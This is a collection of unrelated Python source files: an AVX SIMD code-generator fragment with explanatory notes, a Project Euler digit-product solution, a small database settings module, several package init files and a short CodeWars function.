                    inter_lane = mm256Permute2f128Pd(blend1, blend1, [0,0,0,0,1,0,0,0])
                    return mm256BlendPd(blend0, inter_lane, [0,1,0,0])
                else:
                    src_dsts_map = self.src_dsts_map(src, dsts_by_line)
                    raise Exception('Cannot load-replace when dst is None!')
            else:
                src_dsts_map = self.src_dsts_map(src, dsts_by_line)
                raise Exception('len(src_dsts_map) > 1: Cannot load-replace!')
        else:
            src_reg_pos, dst_reg_pos, dst = src_dsts_map[0]
            notum = [True]*len(dst.mrmap)
            for p in dst_reg_pos:
                notum[dst.mrmap.index(p)] = False
            ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum)
            imm_list = [0]*dst.reglen
            for pos in dst_reg_pos:
                imm_list[dst.reglen-1-pos] = 1
            blend_dst = mm256BlendPd(mm256SetzeroPd(), ld_dst, imm_list)
            if src.reglen == 4 and len(src_reg_pos) == 1 and src_reg_pos[0] == tuple(range(4)): # Analogous of bcast with genLoad
                lane1, posInLane = dst_reg_pos[0] > 1, dst_reg_pos[0] % 2
                immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
                dupLane = mm256Permute2f128Pd(ld_dst, ld_dst, immBitList) # Dup the lane where we can find the value
                return mm256ShufflePd(dupLane, dupLane, [posInLane]*4)
            elif src_reg_pos == dst_reg_pos:
                return blend_dst
            elif len(set([s-d for s,d in zip(src_reg_pos, dst_reg_pos)])) == 1: # shifting
                dist = src_reg_pos[0] - dst_reg_pos[0]
                if len(src.mrmap) == 1 and (all([p>1 for p in src_reg_pos+dst_reg_pos]) or all([p<2 for p in src_reg_pos+dst_reg_pos])):
                    # No cross-lane shift
                    if dist == 1:
                        load_rep = mm256UnpackloPd(mm256SetzeroPd(), blend_dst)
                    elif dist == -1:
                        load_rep = mm256UnpackhiPd(blend_dst, mm256SetzeroPd())
                    return load_rep
                if dist > 0:
                    lane_perm = mm256Permute2f128Pd(ld_dst, ld_dst, [0,0,0,0,1,0,0,0])
                    if dist == 1:
                        load_rep = mm256ShufflePd(lane_perm, blend_dst, [0,1,0,1])
                    elif dist == 2:
                        if len(dst_reg_pos) > 1:
                            load_rep = lane_perm
                        else:
                            load_rep = mm256Permute2f128Pd(blend_dst, blend_dst, [0,0,0,0,1,0,0,0])
                    elif dist == 3:
                        load_rep = mm256UnpackloPd(mm256SetzeroPd(), lane_perm)
                    return load_rep
                else:
                    lane_perm = mm256Permute2f128Pd(ld_dst, ld_dst, [1,0,0,0,0,0,0,1])
                    if dist == -1:
                        load_rep = mm256ShufflePd(blend_dst, lane_perm, [0,1,0,1])
                    elif dist == -2:
                        if len(dst_reg_pos) > 1:
                            load_rep = lane_perm
                        else:
                            load_rep = mm256Permute2f128Pd(blend_dst, blend_dst, [1,0,0,0,0,0,0,1])
                    elif dist == -3:
                        load_rep = mm256UnpackhiPd(lane_perm, mm256SetzeroPd())
                    return load_rep
            else:
                src_dsts_map = self.src_dsts_map(src, dsts_by_line)
                raise Exception('len(src_dsts_map) == 1: Cannot load-replace!')
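The first four-destination case above gathers element 0 of four previously stored registers into one vector with two `unpacklo_pd` steps and a `permute2f128` whose immediate bit list `[0,0,1,0,0,0,0,0]` is 0x20 read MSB-first. A small pure-Python model of the double-precision lane semantics (the helper names are hypothetical stand-ins for the intrinsics, added only for illustration) confirms the gather:

```python
def unpacklo_pd(a, b):  # _mm256_unpacklo_pd: low element of each 128-bit lane
    return [a[0], b[0], a[2], b[2]]

def permute2f128_pd(a, b, imm):  # lane selectors: 0=a.lo, 1=a.hi, 2=b.lo, 3=b.hi
    lanes = [a[0:2], a[2:4], b[0:2], b[2:4]]
    return lanes[imm & 3] + lanes[(imm >> 4) & 3]

# Four stored 4-double registers; the wanted value sits at position 0 of each.
regs = [[10.0 * i + j for j in range(4)] for i in range(4)]
lo = unpacklo_pd(regs[0], regs[1])       # [regs0[0], regs1[0], regs0[2], regs1[2]]
hi = unpacklo_pd(regs[2], regs[3])       # [regs2[0], regs3[0], regs2[2], regs3[2]]
gathered = permute2f128_pd(lo, hi, 0x20) # take the low lane of each intermediate
assert gathered == [regs[i][0] for i in range(4)]
print(gathered)  # [0.0, 10.0, 20.0, 30.0]
```

The same lane model explains the 0x21/0x31-style immediates used by the shifting branches at the end of `mm256LoadGd`.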
    def mm256BroadcastSs(self, src, repList):
        sList = sorted(repList, key=lambda t: t[0], reverse=True)
        dst = sList[0][1]
        if dst.reglen == 8 and dst.mrmap == range(8):
            at = src.pointer.getAt()
            direct = 1 if src.pointer.getMat().size[1] > 1 else 0 # Temp solution
            lane1, posInLane = at[direct] > 3, at[direct] % 4
            immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
            dupLane = mm256Permute2f128Ps(mm256LoaduPs(dst.pointer), mm256LoaduPs(dst.pointer), immBitList) # Dup the lane where we can find the value
            return mm256ShufflePs(dupLane, dupLane, [posInLane]*4)
    def mm256LoadGs(self, src, repList, bounds):
        sList = sorted(repList, key=lambda t: t[0], reverse=True)
        dst = sList[0][1]
        if src.reglen == 8 and len(src.mrmap) == 1 and src.mrmap[0] == tuple(range(8)):
            if dst.reglen == 8: # and dst.mrmap == range(8):
                at = src.pointer.getAt()
                direct = 1 if src.pointer.getMat().size[1] > 1 else 0 # Temp solution
                lane1, posInLane = at[direct] > 3, at[direct] % 4
                immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
                dupLane = mm256Permute2f128Ps(mm256LoadGs(dst.pointer, dst.mrmap), mm256LoadGs(dst.pointer, dst.mrmap), immBitList) # Dup the lane where we can find the value
                return mm256ShufflePs(dupLane, dupLane, [posInLane]*4)
            else:
                raise Exception('Cannot load-replace!')
        else:
            raise Exception('Cannot load-replace!')
class AVX(ISA):
    def __init__(self, opts):
        super(AVX, self).__init__()
        self.name = "AVX"
        fp_m256d = { 'type': '__m256d' }
        fp_m256d['arith'] = [ mm256AddPd, mm256SubPd, mm256MulPd, mm256DivPd, mm256HaddPd ]
        fp_m256d['load'] = [ mm256LoaduPd, mm256MaskloadPd, mm256BroadcastSd, mm256LoadGd, asm256LoaduPd ]
        fp_m256d['misc'] = [ mm256Permute2f128Pd, mm256PermutePd, mm256ShufflePd, mm256UnpackloPd, mm256UnpackhiPd, mm256BlendPd ]
        fp_m256d['set'] = [ mm256SetzeroPd, mm256Set1Pd ]
        fp_m256d['move'] = [ ]
        # fp_m256d['store'] = [ mm256StoreuPd, mm256MaskstorePd ]
        fp_m256d['store'] = [ mm256StoreGd ]
        fp_m256d['loader'] = _Dbl4Loader()
        fp_m256d['nublac'] = _Dbl4BLAC()
        fp_m256d['storer'] = _Dbl4Storer()
        fp_m256d['loadreplacer'] = AVXLoadReplacer(opts)
        fp_m256 = { 'type': '__m256' }
        fp_m256['arith'] = [ mm256AddPs, mm256MulPs, mm256HaddPs ]
        fp_m256['load'] = [ mm256LoaduPs, mm256MaskloadPs, mm256BroadcastSs, mm256LoadGs ]
        fp_m256['misc'] = [ mm256Permute2f128Ps, mm256BlendPs, mm256ShufflePs, mm256UnpackloPs, mm256UnpackhiPs ]
        fp_m256['set'] = [ mm256SetzeroPs ]
        fp_m256['move'] = [ ]
        # fp_m256['store'] = [ mm256StoreuPs, mm256MaskstorePs ]
        fp_m256['store'] = [ mm256StoreGs ]
        fp_m256['loader'] = _Flt8Loader()
        fp_m256['nublac'] = _Flt8BLAC()
        fp_m256['storer'] = _Flt8Storer()
        fp_m256['loadreplacer'] = fp_m256d['loadreplacer']
        self.types = { 'fp': { ('double', 4): fp_m256d, ('float', 8): fp_m256 } }
        self.add_func_defs = [ asm256LoaduPd, asm256StoreuPd ]
# --- Project Euler/8_Largest_Product_in_series.py (Ashwanigupta9125/code-DS-ALGO, MIT) ---
# The four adjacent digits in the 1000-digit number that have the greatest product
# are 9 × 9 × 8 × 9 = 5832.
# 73167176531330624919225119674426574742355349194934
# 96983520312774506326239578318016984801869478851843
# 85861560789112949495459501737958331952853208805511
# 12540698747158523863050715693290963295227443043557
# 66896648950445244523161731856403098711121722383113
# 62229893423380308135336276614282806444486645238749
# 30358907296290491560440772390713810515859307960866
# 70172427121883998797908792274921901699720888093776
# 65727333001053367881220235421809751254540594752243
# 52584907711670556013604839586446706324415722155397
# 53697817977846174064955149290862569321978468622482
# 83972241375657056057490261407972968652414535100474
# 82166370484403199890008895243450658541227588666881
# 16427171479924442928230863465674813919123162824586
# 17866458359124566529476545682848912883142607690042
# 24219022671055626321111109370544217506941658960408
# 07198403850962455444362981230987879927244284909188
# 84580156166097919133875499200524063689912560717606
# 05886116467109405077541002256983155200055935729725
# 71636269561882670428252483600823257530420752963450
# Find the thirteen adjacent digits in the 1000-digit number that have the greatest
# product. What is the value of this product?
import functools
target = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
digits = [int(i) for i in target]
highest = 0
# A 1000-digit number has len(digits) - 12 windows of width 13;
# range(len(digits) - 13) would skip the final window.
for i in range(len(digits) - 12):
    test = functools.reduce(lambda x, y: x * y, digits[i:i + 13])
    if test > highest:
        highest = test
print(highest)
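On Python 3.8+, `math.prod` can replace the `functools.reduce` product and `max()` over a generator replaces the running-maximum loop. A minimal sketch of that variant, using a short sample string (not the 1000-digit number) so it is self-contained:

```python
import math

def greatest_window_product(number: str, width: int) -> int:
    """Largest product of `width` adjacent digits in a digit string."""
    digits = [int(c) for c in number]
    # len(digits) - width + 1 windows exist; math.prod multiplies each slice.
    return max(math.prod(digits[i:i + width])
               for i in range(len(digits) - width + 1))

print(greatest_window_product('3675356291', 5))
```

The generator form avoids building a list of all window products, which matters little at 1000 digits but keeps the code idiomatic.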
a17cc4ffec41cafa375795aa578c3274e9a6d5e1 | 461 | py | Python | client/database/get.py | EvlosCo/go-cli | 4818da63388cf00cca98ee69623bc4450c875804 | ["MIT"] | 1 | 2019-04-15T19:38:45.000Z | 2019-04-15T19:38:45.000Z
from database import models
from database import db
def get_server_url():
    return db.session.query(models.Setting) \
        .filter_by(setting_name='url').first().setting_value


def get_token_name():
    return db.session.query(models.Setting) \
        .filter_by(setting_name='token_name').first().setting_value


def get_token():
    return db.session.query(models.Setting) \
        .filter_by(setting_name='token').first().setting_value
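The three getters differ only in the `setting_name` they filter on, so a single parameterized helper removes the duplication. The `get_setting` name and the in-memory `_settings` dict below are hypothetical stand-ins (the real `db.session` query, shown in the comment, needs the module's database and cannot run standalone):

```python
# Hypothetical stand-in for the settings table so the sketch is runnable.
_settings = {'url': 'https://example.com', 'token_name': 'X-Token', 'token': 'abc123'}

def get_setting(name):
    # With the module's SQLAlchemy session this would be:
    # return db.session.query(models.Setting) \
    #     .filter_by(setting_name=name).first().setting_value
    return _settings[name]

def get_server_url():
    return get_setting('url')

def get_token():
    return get_setting('token')
```

Note that `.first()` returns `None` when no row matches, so the real helper may also want an explicit check before reading `.setting_value`.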
a1886a3d709d4b5030abaf3ec339234d4f5c5e43 | 30 | py | Python | tests/test.py | TheNewThinkTank/dark-matter-attractor | b27daa576faf291e45645aa5f40f5d49e8a1a96d | ["MIT"] | 1 | 2020-06-07T10:03:19.000Z | 2020-06-07T10:03:19.000Z
def test_dummy():
    pass
a1987244e68095d69870e8d90c11f939aa5b25fc | 504 | py | Python | clismo/compiler/__init__.py | jmorgadov/clismo | 1200a5115eef5b2e1801bd1768c78191220ae0e2 | ["MIT"] | 2 | 2022-02-19T22:11:30.000Z | 2022-02-23T18:22:56.000Z
from clismo.compiler.generic_ast import AST
from clismo.compiler.grammar import (Grammar, NonTerminal, Production, Symbol,
                                     Terminal)
from clismo.compiler.parsers.parser import Parser
from clismo.compiler.parsers.lritem import LRItem
from clismo.compiler.parsers.lr1_parser import LR1Parser, LR1Table
from clismo.compiler.parser_manager import ParserManager
from clismo.compiler.terminal_set import TerminalSet
from clismo.compiler.tokenizer import Token, Tokenizer
a19eb7a240ac3a9b6ca22da0bcdd4df0e09d537b | 84 | py | Python | app/dean/__init__.py | jqqqqqqqqqq/CourseCenter | 61e38b4f5e7a312023dd7c58a399f44d110f2b08 | ["MIT"]
from flask import Blueprint
dean = Blueprint('dean', __name__)
from . import views
a1c17c3fb80473cc633bf571c3ca352f3084b809 | 89 | py | Python | core/utils/__init__.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | ["MIT"]
from .activation import *
from .cost import *
from .weights import *
from .tests import *
a1e6aff5c732d17d561527aeffb0acaa2a8d1e8b | 76 | py | Python | gal_gen/__init__.py | andrevitorelli/TenGU | 539a39552bb18cc19dc941003e2a44d646da98e1 | ["MIT"] | 1 | 2021-03-19T15:36:48.000Z | 2021-03-19T15:36:48.000Z
"""gal_gen dataset."""
from .gal_gen import GalGen
from .galaxies import *
629b6023fe7a67774d5a63070d46f302aeb06004 | 88 | py | Python | CodeWars/7 Kyu/Decreasing Inputs.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | ["MIT"]
def add(*args):
    return round(sum(a / float(i) for i, a in enumerate(args, start=1)))
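The function divides each argument by its 1-based position before summing, then rounds the total. A self-contained worked example (the definition is repeated so the snippet runs on its own):

```python
def add(*args):
    # enumerate(args, start=1) pairs each value with its 1-based position i,
    # so the sum is a1/1 + a2/2 + a3/3 + ...
    return round(sum(a / float(i) for i, a in enumerate(args, start=1)))

# 4/1 + 2/2 + 3/3 = 4 + 1 + 1 = 6.0, rounded to 6
print(add(4, 2, 3))
```

Note that Python's `round` uses banker's rounding, so a sum ending in exactly .5 rounds to the nearest even integer.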